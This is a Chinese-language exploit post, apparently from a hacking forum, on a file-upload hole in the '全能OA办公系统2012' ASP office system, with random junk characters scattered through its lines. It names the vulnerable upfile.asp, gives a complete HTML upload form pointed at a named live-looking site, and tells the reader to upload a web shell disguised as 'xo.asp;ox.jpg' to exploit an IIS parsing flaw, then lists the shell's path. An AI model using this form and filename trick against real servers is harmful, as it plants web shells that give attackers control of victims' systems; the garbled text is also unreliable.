全能OA办公系统 上传漏洞
! L' c! l [ }# \
; u: A0 A4 d4 E6 t) f6 R系统介绍:
, U. M& v& a! g& H7 t: ~5 ~7 B, v* j' Y+ i( P
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
- e1 K9 B: T9 O2 y: E. D4 L# Z- J
主要功能:
$ f! Z) p; ^6 H; q3 w/ W公司通告
: ]1 Y3 n5 a7 `3 C/ c' u工作计划
% ?, ^2 g S* }, N; `; i$ F通讯助理 ; }8 C" {$ d2 h- S) ^# j/ [! z W
客户资源 # _2 b0 V' ~: \) r2 \9 Y
我的公文 . A0 p8 h0 s3 s7 B
公文传阅
' Z7 X; d- W% {( \2 E, q公共资源
2 ?* _* x& }1 |9 b$ X/ q2 p资源预约 * E* F7 P! c/ Y% L* @
今日考勤 6 E. [, l; P; R( Y4 A, T
个人计划
" w0 a. i' C# C+ f. a( P4 p个人通讯录
! d+ |$ U, |2 p5 L个人基本档案 3 w" b; B; T! i
未读邮件
( h" e& b8 S% c) |6 }发邮件
9 R+ @$ K/ ?' @6 X收件夹
9 Q$ L9 ?6 \* Z- C1 L9 F寄件夹
2 K2 s2 G0 A7 `+ r网络硬盘 5 e+ S* p( k7 ^1 e5 N
网络会议 4 p3 e: H! H# e3 m! l
网络调查 + Q' @3 d/ a5 }1 }* V$ ^1 `
交流论坛4 g5 |* p% l' L6 y( V, g% t0 \
/ l: V, y+ W0 G6 ^1 `5 `1 M有兴趣测试的朋友可以下源码看看- s3 G3 T$ e; B
* k! n, N B |
源码下载:% F& c) v0 B6 L3 B) q9 p" O4 B
' `! w: F$ @ Vhttp://www.mycodes.net/30/4750.htm. z8 o# p' [& X
7 I1 {. i( n `6 N- ~9 e9 e" {漏洞介绍:
' t& ~% g8 {9 u; o4 O$ Q
) e0 @ g" x2 P1 Q0 g由upfile.asp上传文件漏洞引起4 I% N8 y# l8 s0 `. b, q- ?
U, T; l. Y! J9 T测试方法:) R3 E/ p) j* H- c" R, w+ V
; u2 ~* c3 q% w! C8 p使用名小子上传http://www.itlynn.com/upfile.asp即可
. U1 ?% M: d `/ [2 r, x: Z" ]# N7 q( E8 g9 f0 |' I
如果upfile.asp文件被删除不存在。7 K9 W/ N- o. I5 h- S7 M& N9 W
; y- }* h9 Y3 i1 Q! W
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。$ s( i. S7 ?9 ~6 z3 x6 q1 [3 f+ L
3 L# u: b( ^6 ~( |如果存在那么将如下代码保存为upfile.html。" |- H5 P# m! R6 P
9 x g9 B7 x" h# }0 w然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
; k& I% f& M- Y# _: v
3 J z( N0 D: h5 k5 _0 i, g
5 `5 w0 w' l( Z7 L6 k; z: t- g) y0 a' m/ H+ _1 l% {
01 <table border='0' align="center" cellpadding="5"> + i# Q0 K# W+ t$ L4 e# X$ f
4 q$ E- ~7 y# {' W02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
% m3 X3 S8 ^5 O) d' \- f8 |3 i% i1 u+ K
03 <tr>
+ j' O1 _: N( v0 {% ?" \
5 m- J" I& T8 N ]/ {04 <td>报错:</td> 4 O- r# w3 R0 n( A
7 }& t- f+ c# e+ s
05 <td><input type='radio' name='errnumber' value='0'>
* n. ]( d* x; I& A: Z
, a# }* O9 [9 m. K" o3 n06 自动更名
. `- n7 s) L, t/ j6 P" W
( s$ m. I/ I- w07 <input type='radio' name='errnumber' value='1' checked> ! L/ u1 o/ j" ~' r( u
6 v, d1 i$ s# A4 E' K08 报错方式
$ j# O/ X, M' o$ R& i s0 R' Q" x4 G
09 <input type='radio' name='errnumber' value='2'>
0 C- f- y! h9 Y5 \9 s" p/ ~3 H& ?2 ?, X5 k
10 直接覆盖</td> / U4 P: F) I" M5 W8 F
1 \+ Q; u8 N0 X11 </tr>
5 }! G5 i* I; U! h) d" E4 b
9 L2 F2 p6 b& h# c; L12 <tr> 5 y! W8 Y2 K) x _: w% y
3 [; o6 U: U1 ~0 `1 \' h4 Z
13 <td>主题:</td> % \+ [, S* ^8 _
t/ s- y) K, |: ?, Q$ M6 V+ M4 }5 P14 <td><input type='text' name='filename' size='30'></td>
" Y& T, w. j4 X Y/ B9 j
8 I T$ t3 ~1 b7 b. G15 </tr>
) s/ Z- m4 Y: e+ N/ v7 n
. R, A+ k" p- a7 `16 <tr> F8 f1 ~) j; }: q+ u4 U
3 a" T9 C/ q6 @. U$ q% S
17 <td>文件:</td>
$ ?: l, _; U: M5 z# b. P7 Q$ K
p* w& O# t m/ F18 <td><input type="file"name="fruit"size="30"></td>
) j* j! B% }9 H& V: P9 X. K* u; p
19 </tr> 7 R% _. k: N/ d) k+ f9 N0 e1 H' d
. Y j( Q4 v9 t, Y1 e20 <tr> 5 m) O; d7 o" O, E
# z; s3 Y6 G) a% f
21 <td valign='top'>简介:</td>
: }/ R( M! L9 [. l1 A7 f& e. c, U4 ^2 T9 Z# Z" j/ C# v
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
+ f7 Q# L r1 v4 j# R% V9 w' q2 [* i! r0 X9 {( ?
23 </tr> 6 l p! e8 q1 G& E
6 f1 @* ^% ? w. l0 m24
3 `. X1 d2 e' l& F$ ~& b9 T) H; j4 O' G% N8 H
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
+ A, Z3 c$ g/ ^
" P0 M: F3 f3 `8 N3 A26 </tr> % m' Q7 M* f) A$ V
s- f; I* s; ~5 n# B3 F27 </form> - V; M% C* k6 \" t! Z- O) J
, ^# S/ B8 P, M% u0 \; P2 z然后打开上传一个文件名为xo.asp;ox.jpg的文件。 M- z4 [$ _/ b2 Z2 X- f
p; j, S- @: C' |) o- S! O T7 ? 4 m& ~# R' `5 I- F
' w1 _% t* z2 D4 G# K4 ~" N
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
* N# ?+ J* t I* d# N) e4 S5 h1 N) k3 J
此漏洞需要配合解析漏洞利用。! O5 z" R+ f* r; Z& X
6 h4 b2 s0 m% g+ s' _
|